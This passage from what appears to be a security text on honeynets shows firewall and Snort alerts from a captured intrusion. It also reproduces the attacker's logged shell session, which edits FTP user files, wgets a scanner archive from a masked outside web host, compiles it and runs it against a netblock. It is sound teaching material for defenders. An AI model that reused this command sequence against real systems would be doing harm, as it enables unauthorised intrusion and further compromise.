20.3 Capturing Attacks

Once your honeynet is live, what happens next ? You run into one of the following examples. Here's a probe ( reported by the iptables firewall):

 Jun 25 18:14:47 fw kernel: INBOUND: IN=eth0 OUT=eth1 SRC=E.V.I.L DST=H.O.N.EY LEN=48  TOS=0x00 PREC=0x00 TTL=113 ID=48230 DF PROTO=TCP SPT=2934 DPT=21 WINDOW=8192 RES=0x00  SYN URGP=0 

This example is a successful exploit (reported by Snort):

 06/25-18:15:03.586794  [**] [1:1378:7] FTP wu-ftp file completion attempt { [**]  [Classification: Misc Attack] [Priority: 2] {TCP} 63.161.21.75:3976 -> 10.1.1.2:21 

Here's an owned system (reported by Snort):

 Jun 25 18:017:38 ids snort: [1:498:3] ATTACK RESPONSES id check returned root  [Classification: Potentially Bad Traffic] [Priority: 2]: {TCP} 10.1.1.2:21 ->  63.161.21.75:3977 

The next example is an attacker command-session in which he checks who is on the system, secures it, gets his attack scanner, and starts looking for more boxes to exploit (this is the actual captured session, but the web address has been modified):

 w       ls                                                                     cd /dev/ida                                                            ls                                                                     echo "anonymous" >> /etc/users                                         echo "ftp" >>/etc/ftpusers                                             echo "anonymous" >>/etc/ftpusers                                       echo "anonymous" >> /etc/user                                          wget www.geocities.com/replaced_for_privacy/awu.tgz  tar zxvf awu.tgz                                                       cd aw                                                                  make                                                                   ./awu 63.190 

It is interesting to note that by using cd /dev/ida; ls the attacker checks whether his rootkit installed correctly in this location. He also performs simple system hardening in order to prevent re-exploitation by his " friends " (note that disabling anonymous FTP access closes this particular hole). This technique is a standard practice of modern script kiddies.